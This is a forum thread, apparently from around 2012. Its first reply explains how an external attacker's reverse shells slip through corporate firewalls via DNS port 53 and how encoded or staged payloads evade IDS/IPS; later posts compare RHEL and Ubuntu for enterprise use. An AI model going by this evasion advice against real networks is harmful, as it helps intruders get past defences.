By and large if you're simply talking about standard firewalling and ACLs (not IPS, I'll get into that in a moment). You have to major factors to deal with when dealing with a large enterprise network. This is obviously taken from the perspective of an external attacker, so there may be limited if any internet facing systems. Which is where client side attacks come in, social engineering etc... In most cases if the methods discussed in the original post are carried out properly, IE a reverse shell, it will still bypass most corporate firewalls. NAT routing is NAT routing, and if the machine internal to the router has access out , an attacker can get a shell back. That being said, most CCNE's are rather clever (or so they think) and like to do things like IP whitelisting, and port whitelisting. Two things on that.
- Most client side systems (not production systems unless it's something like a globally accessible webserver) will have access to the Internet, so pretty much every IP is fair game when it comes to whitelisting.
- Ports... Okay, even if you block the obvious outbound on 7777 , you're not blocking (can't block) 53 UDP , and probably aren't blocking 53 TCP (zone transfers and large DNS requests).
When you get more in depth and start talking about IPS you need to get more creating to bypass them. You start getting into things like encoding payloads to evade IDS/IPS and staged payloads. Most of these will effectively bypass even the best enterprise class IPS solutions if carried out properly (IE: your payload isn't signatured) now...If you toss back a reverse netcat or an unencoded meterpreter, you probably won't have a whole lot of success with a decent IPS. Though, some older appliances won't pick them up.
Hopefully this helps, but by and large the basic principles in the original article will scale quite well to any size network, bearing in mind that you would be attacking an internet facing system or data management zone.
We dont use debian or Ubuntu . For a lot lf reasons. The main being that RHEL is the industry stabdard in terms of stability and support. Also bleeding edge distros like Ubuntu tend to be avoided in production shops.
If you are interested in learning more about businesses that do use Ubuntu or Debian, I know that on the west coast they are becoming pretty popular with small to mid size
Hope this helps
Fedora is at 16 currently. Do you know what version number RHEL is at now if it was loosely compared to a Fedora version? Like is RHEL roughly equivalent to Fedora 10?
Last edited by nrundy; February 18th, 2012 at 04:36 PM.
PS: Shame that Win is like a leaky bucket so RHEL and a million other things need to be there in the first place for big corps using both. Catch 22/28 I guess. The story is never ending, that I understand also ...
Last edited by Bucky Ball; February 18th, 2012 at 05:10 PM.
To answer both questions RHEL does have some pretty spiffy tools for enterprises. things like kickstart, satellite server, red hat virtualization, tight integration of jboss etc.
That being said, Ubuntu does have some similar tools. Landscape, tighter cobbler support in 12.04 etc. The LTS versions are more stable, but Ubuntu is the new kid on the block, and when corporations have been using RHEL for 8 or more years its going to be hard to push a conversion. You can make the finance argument but a few thousand dollars for RHEL entitlements is a drop in the bucket for companies like that
As far as Windows goes it can be rather successful in a corporate environment and there is no better MTA than Exchange so you get kind of stuck there
Hope thus helps
Firewall on Ubuntu? No if you want to use it like normal user, Yes if you afraid of privacy very much.